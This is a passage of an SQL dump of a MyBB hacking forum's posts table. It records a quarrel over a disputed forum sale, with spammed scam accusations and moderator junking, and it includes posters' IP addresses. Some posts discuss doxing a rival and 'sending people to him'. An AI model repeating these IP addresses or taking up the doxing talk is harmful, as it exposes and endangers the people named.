AnarchyForums, I decided to come to this forum. The owner of that is a complete idiot and cannot run a forum. So let\'s hope this forum is much better, although it wouldn\'t be hard to top it. <3', '78.149.68.187', '1318405307', '0', '0', '0', '0', '1', '2d960f358c0c68bb245e0b79a0d4723a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3823', '748', '3821', '19', 'RE: What the fuck is going on right now?', '0', '1', 't3h jok3r', '1349652117', 'As I said it\'s not sold and will never be sold.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ce6f72a7f9a1534daa08ee3bead00723', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3824', '746', '3801', '19', '[Junk]L33thacking wtf.....', '0', '1', 't3h jok3r', '1349652135', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3825', '748', '3821', '19', '[Junk]What the fuck is going on right now?', '0', '61', 'NXK', '1349652149', 'This thread has been junked. [hr] This thread has been junked. [hr] This thread has been junked.', '99.253.94.204', '1677549260', '1', '0', '61', '1349652150', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3821', '748', '0', '19', '[Junk][Junk][Junk]What the fuck is going on right now?', '0', '61', 'NXK', '1349651963', 'I don\'t get this, Was the website sold or not. This is so confusing.. I\'m not wasting my time here anymore if this was sold.', '99.253.94.204', '1677549260', '1', '0', '61', '1349652070', '1', '708fe30df7b9cb14c8f3a5d7c554fc0d', '0', '1349652070'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3826', '743', '3792', '23', 'RE: I got a virus', '0', '232', 'BreShiE', '1349652271', 'If you\'d like to allow me on your TeamViewer, I could remove this for you.', '78.149.68.187', '1318405307', '0', '0', '0', '0', '1', '16362a1cf80a2eea3299a12306543e83', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3827', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349653392', 'Sigh. So you\'re telling me I was accused for all of this.. Oh well. I\'m gone from this forum anyways. Laters everyone. Gonna make my thread now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '599d53af51d18ae12741483b6b3a10a2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3828', '750', '0', '3', 'Leaving', '0', '82', 'iTzIpod', '1349653476', 'Bye. Feel free to add me on Skype. Shit happened today. Don\'t really want to discuss it. My journey has come to an end. Good bye everyone. Farewell.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5a43ee071c6073efd3ab6d3bf266c61b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3829', '747', '3827', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349653487', '[quote=\'iTzIpod\' pid=\'3827\' dateline=\'1349653392\'] Sigh. So you\'re telling me I was accused for all of this.. Oh well. I\'m gone from this forum anyways. Laters everyone. Gonna make my thread now. [/quote] 1. It doesn\'t state that you were behind this anywhere on this thread. 2. Good Bye.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dd0cda06f982e3009b4f6987e9d33c27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3830', '750', '3828', '3', 'RE: Leaving', '0', '232', 'BreShiE', '1349653802', 'You\'ll regret this decision, trust me. I used to like AF, but you\'ll come to learn how bad it is.', '78.149.68.187', '1318405307', '0', '0', '0', '0', '1', '2e38881e20e3c25085d4eba56acac54e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3831', '750', '3828', '3', 'RE: Leaving', '0', '82', 'iTzIpod', '1349654057', 'Well. I kinda made my decision. But who knows? I sometimes do stupid things when I\'m in a bad mood.. Might change my mind tomorrow or so.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c51f8aa6db15f9fcc8a0cb522d5021f5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3832', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '82', 'iTzIpod', '1349654099', 'You told me on Skype about this. You accused me of doing those actions earlier today. And now you\'re acting like I had nothing to do with this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '38ed36c78563e3cdcff44fa61297884c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3833', '743', '3792', '23', 'RE: I got a virus', '0', '82', 'iTzIpod', '1349654135', 'I think I got this taken care of. I\'m not sure though. I may be wrong.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e46f01624155e1508547f6b7e8f3531', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3834', '751', '0', '19', '[Junk]Regarding L33tforums.net', '0', '243', 'Anarchy $ucks', '1349654543', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'bb5352cbac323b4d097d6c350d502acf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3835', '752', '0', '19', '[Junk]t3h jok3r is a scammer', '0', '243', 'Anarchy $ucks', '1349654582', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '60bc6ada8c5a6bfe6f7dbcbb7f63db89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3836', '751', '3834', '19', '[Junk]Regarding L33tforums.net', '0', '1', 't3h jok3r', '1349654599', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3837', '752', '3835', '19', '[Junk]t3h jok3r is a scammer', '0', '1', 't3h jok3r', '1349654609', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3838', '753', '0', '19', '[Junk]Your site owner', '0', '243', 'Anarchy $ucks', '1349654724', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'be1f06e94c35331d62ae5f7f2f06719a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3839', '754', '0', '19', '[Junk]Your Site Owner', '0', '243', 'Anarchy $ucks', '1349654755', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '3a477315388a78ed519bf1ce46886de9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3840', '747', '3832', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349654782', '[quote=\'iTzIpod\' pid=\'3832\' dateline=\'1349654099\'] You told me on Skype about this. You accused me of doing those actions earlier today. And now you\'re acting like I had nothing to do with this.. [/quote] Well because you said it yourself in the \"This forum is dead\" thread in the VIP section. I thought you did it and I apologized for accusing you.', '72.231.24.165', '1223104677', '1', '0', '1', '1349654890', '1', '2ca540929167ccc9a39bb03f90ef4cab', '0', '1349654890'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3846', '755', '3845', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349655277', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3847', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '234', 'SamuelNguyen', '1349655523', 'wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;)', '95.140.125.125', '1603042685', '0', '0', '0', '0', '1', '85cec3bdbe0d217d5568449f9e7f9054', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3848', '747', '3847', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349655694', '[quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\'] wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;) [/quote] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries.', '72.231.24.165', '1223104677', '1', '0', '1', '1349655725', '1', 'dc9c2635087cc0298c10c45529bf9dc7', '0', '1349655725'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3849', '747', '3848', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '234', 'SamuelNguyen', '1349655945', '[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\'] [quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\'] wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;) [/quote] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries. [/quote] ok thanks, if you need help doxing i can help', '95.140.125.125', '1603042685', '0', '0', '0', '0', '1', '6c7f0d05ab9b475b0c4b635719cc412b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3842', '753', '3838', '19', '[Junk]Your site owner', '0', '1', 't3h jok3r', '1349655068', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3843', '754', '3839', '19', '[Junk]Your Site Owner', '0', '1', 't3h jok3r', '1349655068', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3845', '755', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349655220', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'c897798fe552593621503793ca4d4761', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3850', '747', '3848', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349656042', '[quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\'] [quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\'] wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;) [/quote] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries. [/quote] I hope English isn\'t your only language. :roflol: Once again, we had absolutely nothing to do with your downtime or the removal of you on Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'ea5f5c4ee2e111c65c6c1278608dfb53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3851', '756', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349656077', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'aa30c4487fba2933c12bb392eb26d552', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3852', '747', '3850', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349656495', '[quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\'] [quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\'] [quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\'] wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;) [/quote] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries. [/quote] I hope English isn\'t your only language. :roflol: Once again, we had absolutely nothing to do with your downtime or the removal of you on Google. [/quote] Prove it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '57ed1f970fe03a3c71f283cbcbaa0894', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3853', '747', '3852', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349656687', '[quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\'] [quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\'] [quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\'] [quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\'] wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;) [/quote] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries. [/quote] I hope English isn\'t your only language. :roflol: Once again, we had absolutely nothing to do with your downtime or the removal of you on Google. [/quote] Prove it. [/quote] How do I prove I didn\'t attack you? That makes no sense. I would have to find out who did.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'ede3f0b901b9b547ad05550bfce41fc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3854', '747', '3853', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349656866', '[quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\'] [quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\'] [quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\'] [quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\'] [quote=\'SamuelNguyen\' pid=\'3847\' dateline=\'1349655523\'] wow how pathetic is the anarchist...anyway i can get this dox? i would like to send some people to him ;) [/quote] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries. [/quote] I hope English isn\'t your only language. :roflol: Once again, we had absolutely nothing to do with your downtime or the removal of you on Google. [/quote] Prove it. [/quote] How do I prove I didn\'t attack you? That makes no sense. I would have to find out who did. [/quote] Go through your forums PMs and find who did it. Also tell me do you have any other enemies online?', '72.231.24.165', '1223104677', '1', '0', '1', '1349656910', '1', '5c1527c76e6d02620e5baee1c0f0d86d', '0', '1349656910'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3855', '757', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349656973', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '84452c90b61fc7edc38a77ce434e3337', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3856', '747', '3854', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349657148', '[quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\'] [quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\'] [quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\'] [quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\'] [quote=\'t3h jok3r\' pid=\'3848\' dateline=\'1349655694\'] Currently incomplete. Just waiting for his hosting and ISP to reply back to my inquiries. [/quote] I hope English isn\'t your only language. :roflol: Once again, we had absolutely nothing to do with your downtime or the removal of you on Google. [/quote] Prove it. [/quote] How do I prove I didn\'t attack you? That makes no sense. I would have to find out who did. [/quote] Go through your forums PMs and find who did it. Also tell me do you have any other enemies online? [/quote] Lets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up. Not only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '9a48dd5ccf8d4350236cc0ea369681cb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3857', '747', '3856', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349657256', '[quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\'] [quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\'] [quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\'] [quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\'] [quote=\'Anarchy $ucks\' pid=\'3850\' dateline=\'1349656042\'] I hope English isn\'t your only language. :roflol: Once again, we had absolutely nothing to do with your downtime or the removal of you on Google. [/quote] Prove it. [/quote] How do I prove I didn\'t attack you? That makes no sense. I would have to find out who did. [/quote] Go through your forums PMs and find who did it. Also tell me do you have any other enemies online? [/quote] Lets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up. Not only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us. [/quote] Lol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6d07280523ea6b3f89d7e4ec967d2d5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3858', '747', '3857', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349657526', '[quote=\'t3h jok3r\' pid=\'3857\' dateline=\'1349657256\'] [quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\'] [quote=\'t3h 